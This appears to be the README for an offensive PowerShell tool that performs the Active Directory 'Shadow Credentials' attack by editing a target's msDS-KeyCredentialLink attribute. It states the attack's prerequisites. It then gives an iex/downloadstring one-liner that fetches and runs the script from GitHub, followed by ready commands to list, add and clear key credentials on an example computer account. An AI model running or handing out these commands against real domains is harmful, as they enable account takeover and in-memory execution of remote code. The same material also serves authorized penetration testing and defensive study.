Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute
This tool is heavily inspired to Whisker by Elad Shamir (@elad_shamir).
This tool is based on code from DSInternals by Michael Grafnetter (@MGrafnetter).
For this attack to succeed, the environment must have a Domain Controller running at least Windows Server 2016, and the Domain Controller must have a server authentication certificate to allow for PKINIT Kerberos authentication.
Also, you need the necessary rights to edit the msDS-KeyCredentialLink attribute of the specified target.
More details are available at the post Shadow Credentials: Abusing Key Trust Account Mapping for Takeover.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/KeyCredentialLink/main/KeyCredentialLink.ps1')
List-KeyCredentials -target "ABUSECOMP$" -domain "ferrari.local" -dc "dc01.ferrari.local"
Add-KeyCredentials -target "ABUSECOMP$" -domain "ferrari.local" -dc "dc01.ferrari.local"
Clear-KeyCredentials -target "ABUSECOMP$" -domain "ferrari.local" -dc "dc01.ferrari.local" -deviceId "<deviceID>"
Clear-KeyCredentials -target "ABUSECOMP$" -domain "ferrari.local" -dc "dc01.ferrari.local" -Force